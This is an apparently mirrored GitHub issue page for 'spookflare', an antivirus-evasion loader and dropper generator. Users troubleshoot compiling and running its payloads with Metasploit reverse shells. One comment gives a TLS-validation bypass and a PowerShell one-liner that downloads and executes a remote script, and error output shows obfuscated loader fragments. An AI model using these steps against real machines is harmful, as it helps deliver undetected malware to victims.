Coder Social home page Coder Social logo

hlldz / spookflare Goto Github PK

View Code? Open in Web Editor NEW
944.0 50.0 190.0 78 KB

Loader, dropper generator with multiple features for bypassing client-side and network-side countermeasures.

License: Apache License 2.0

Python 100.00%
av-bypass loader dropper av-evasion endpoint-bypass antivirus-evasion antivirus-testing obfuscation bypass

spookflare's People

Contributors

hlldz avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

spookflare's Issues

pip installation issue

When I run pip install -r requirements.txt in kali linux I get the following.

image

I also got the same error for textwrap

Compile C# in Kali (Debian)?

Hello, can you assist with compiling the .cs files using some Linux variant? I think it can be done using mono as seen here but MonoDevelop crashes when I try importing .cs files. Any ideas?

Error : Powershell and cs loader

Hi,
I tried to generate the loader using option 2 powershell and cs loader, I compiled using csc but its gave me this error:

Exception

calling "DownloadData" with "1" argument(s): "The server committed a protocol violation.
Section=ResponseStatusLine"
At E:\a.ps1:6 char:258

  • ... ,en;q=0.5");[Byte[]] $SXBQYrXFaTja = $MBmARZhcoqfe."DownloadDat ...
  •             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    • FullyQualifiedErrorId : WebException

Exception calling "Copy" with "5" argument(s): "Value cannot be null.
Parameter name: source"
At E:\a.ps1:6 char:413

  • ... Length - 0);[Array]::Copy($SXBQYrXFaTja, 0, $nUUuHCSJJEek, 0, ($SXBQY ...
  •             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    • FullyQualifiedErrorId : ArgumentNullException

Exception calling "Copy" with "4" argument(s): "Value cannot be null.
Parameter name: destination"
At E:\a.ps1:6 char:691

  • ... x3000,0x40);[Runtime.InteropServices.Marshal]::Copy($nUUuHCSJJEek, 0, ...
  •             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    • FullyQualifiedErrorId : ArgumentNullException

exe has stopped working

The target Windows 10 operating system is using x64, also used x64 when generating the EXE. An msf connection is established between my windows device and kali device, but the EXE crashes almost immediately and the connection is closed.

spook

This time I used the latest available release. But I've noticed the v1.0 interface is a lot different from the latest interface used when I git clone your repository. @hlldz

File "spookflare.py", line 31

I'm having some issues running spookflare in Windows 10. Python is installed and $ pip install -r requirements.txt worked without any errors. What am I doing wrong here?

C:\Users\xajyvi\Desktop\SpookFlare>python spookflare.py
  File "spookflare.py", line 31
	print " \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n"
																									^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(" \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n")?

C:\Users\xajyvi\Desktop\SpookFlare>.\spookflare.py
  File "C:\Users\xajyvi\Desktop\SpookFlare\spookflare.py", line 31
	print " \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n"
																									^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(" \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n")?

Run tool

Hi, I would like to know how to run the tool on the Kali Linux terminal, tried in a few ways but could not execute, tried ./SpookFlare.sln but did not run, what would be the correct procedure?
Thank you.

Work Like the BEEF?

Doesn't it work like the beef like working on the client side without any download, Where most of the victims knew that the downloaded files will be malware!
Is there any other implementation like running background of the browser!

Not getting shell

@hlldz
PROTO : https
patched : no

payload used

  1. windows/x64/meterpreter/reverse_https
  2. windows/x64/meterpreter/reverse_winhttps

Compiler

  1. Visual studio 2017
  2. csc

Metasploit version
5.0.22-dev

windows version
windows 10 v1809 (build 17763)

Defender & firewall was off during testing.

Nothing happens after executing .exe file.

Also Can I compile it using mono on linux?

Problem With SpookFlare.rc

Hello and congratulation for the great tool.
Im encountering a problem while operating with the tool.
Following the instructional video i'm not able to find the SpookFlare.rc file
spookflare_problem

Here also what i have in the folder
spookflare_problem2

in the end, im having this error:
spookflare_problem3

Is there a way to fix this ? I'll be waiting for an answer, thanks again!

C# kodunu derlerken "Newline in constant" hatası

C# kodunu csc.exe ile derlemek istediğimde aşağıdaki hata ile karşılaşıyorum:

Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,56): error CS1010: Newline in constant Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected

SSL/TLS Negotiation Error with Powershell Payload and MSF - FIX/WORKAROUND

So this is a great project! So currently the https ps1 payload will give you the following error: Exception calling "DownloadFile" with "2" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."

You can get around this by placing the following code at the top of the ps1 output file generated by spookflare:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Once you do that you can just call the file from a cmd prompt like so and get your https meterpreter shell: powershell -w 1 -c "iwr('http://x.x.x.x/PS1-OUTPUT.txt')|iex"

Cheers!

SpookFlare [vba/macro] > set CMD

Getting this when i run the set CMD

SpookFlare [vba/macro] > set CMD
Traceback (most recent call last):
File "spookflare.py", line 459, in
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 78, in do_use
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 78, in do_use
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 430, in do_set
vbaCmdFile = line.split()[1]
IndexError: list index out of range

Thanks

cmd window

why there have a cmd window appear and exit?

the exe crashed

Hi
i'm compile the code and run it on windows 8 32bit
but in the last step when generate the payload it's crashed

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.